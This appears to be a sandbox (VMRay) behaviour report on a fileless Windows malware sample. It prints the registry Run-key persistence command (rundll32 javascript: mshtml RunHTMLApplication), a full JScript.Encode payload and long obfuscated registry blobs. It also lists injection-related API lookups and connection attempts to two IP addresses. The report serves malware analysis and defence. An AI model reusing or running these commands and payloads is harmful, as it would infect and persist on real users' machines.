0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 6
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 2
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 2
Fn
Module (107)
+
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76f00000 True 1
Fn
Load ntdll.dll base_address = 0x77c60000 True 1
Fn
Load WS2_32.dll base_address = 0x75820000 True 1
Fn
Load SHLWAPI.dll base_address = 0x776e0000 True 1
Fn
Load WININET.dll base_address = 0x77370000 True 1
Fn
Load RPCRT4.dll base_address = 0x76bf0000 True 1
Fn
Load imagehlp.dll base_address = 0x76b00000 True 1
Fn
Load USERENV.dll base_address = 0x75710000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76b50000 True 1
Fn
Load ole32.dll base_address = 0x77210000 True 1
Fn
Load msvcrt.dll base_address = 0x75860000 True 1
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77c60000 True 1
Fn
Get Handle c:\windows\syswow64\ws2_32.dll base_address = 0x75820000 True 1
Fn
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x776e0000 True 1
Fn
Get Handle c:\windows\syswow64\wininet.dll base_address = 0x77370000 True 1
Fn
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x76bf0000 True 1
Fn
Get Handle c:\windows\syswow64\imagehlp.dll base_address = 0x76b00000 True 1
Fn
Get Handle c:\windows\syswow64\userenv.dll base_address = 0x75710000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76f00000 True 3
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76b50000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x77210000 True 1
Fn
Get Handle c:\windows\syswow64\dllhost.exe base_address = 0xa50000 True 1
Fn
Get Filename c:\windows\syswow64\dllhost.exe process_name = c:\windows\syswow64\dllhost.exe, file_name_orig = C:\Windows\syswow64\dllhost.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76f11856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76f11245 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76f11222 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x77cad2f3 True 2
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 16, address_out = 0x75826b0e True 2
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7770c45b True 2
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x7737d075 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x76c17c12 True 2
Fn
Get Address c:\windows\syswow64\imagehlp.dll function = CheckSumMappedFile, address_out = 0x76b08303 True 2
Fn
Get Address c:\windows\syswow64\userenv.dll function = CreateEnvironmentBlock, address_out = 0x75711a7a True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76b6469d True 2
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x7722b636 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x77d354a7 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x77cd5c30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x77c801b4 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueryValueKey, address_out = 0x77c7fa98 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x77c7ff14 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x77c7fb30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x77d298c3 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77d34760 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x77cd9d88 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlImageNtHeader, address_out = 0x77c93164 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x77c9ad68 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x77c8df20 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 115, address_out = 0x75823ab2 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 3, address_out = 0x75823918 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 19, address_out = 0x75826f01 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 4, address_out = 0x75826bdd True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75837673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 23, address_out = 0x75823eb8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathUnquoteSpacesA, address_out = 0x7770ecc7 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameA, address_out = 0x776f00aa True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrCmpNIA, address_out = 0x776ed11c True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrChrA, address_out = 0x776ec5e6 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x776ed250 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x77cbd598 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76f17a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76f114b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventA, address_out = 0x76f1328c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x76f17a2f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WinExec, address_out = 0x76f92c21 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76f11282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76f153c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempFileNameA, address_out = 0x76f39d3f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathA, address_out = 0x76f3276c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76f110ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76f2d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeThread, address_out = 0x76f2d5b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76f11136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x76f143ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x76f2d9e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x76f2d9b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76f11072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x76f2eb39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76f1110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76f13519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76f11410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76f149d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x76f13e8e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76f111c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76f1186e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76b614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76b646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x76b648ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExA, address_out = 0x76b614b3 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76b61469 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76b64304 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = _beginthreadex, address_out = 0x7587132e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x76f1195e True 2
Fn
System (11)
+
Operation Additional Information Success Count Logfile
Sleep duration = 5000 milliseconds (5.000 seconds) True 9
Fn
Get Info type = Operating System False 2
Fn
Network Behavior
DNS (2)
+
Operation Additional Information Success Count Logfile
Resolve Name host = 178.89.159.34, address_out = 178.89.159.34 True 1
Fn
Resolve Name host = 178.89.159.35, address_out = 178.89.159.35 True 1
Fn
TCP Sessions (1)
+
Information Value
Total Data Sent 0.00 KB (0 bytes)
Total Data Received 0.00 KB (0 bytes)
Contacted Host Count 2
Contacted Hosts 178.89.159.34:80, 178.89.159.35:80
TCP Session #1
+
Information Value
Handle 0x1c8
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.89.159.34
Remote Port 80
Local Address
Local Port
Data Sent 0.00 KB (0 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 178.89.159.34, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
+
Information Value
Handle 0x1c8
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.89.159.35
Remote Port 80
Local Address
Local Port
Data Sent 0.00 KB (0 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 178.89.159.35, remote_port = 80 False 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image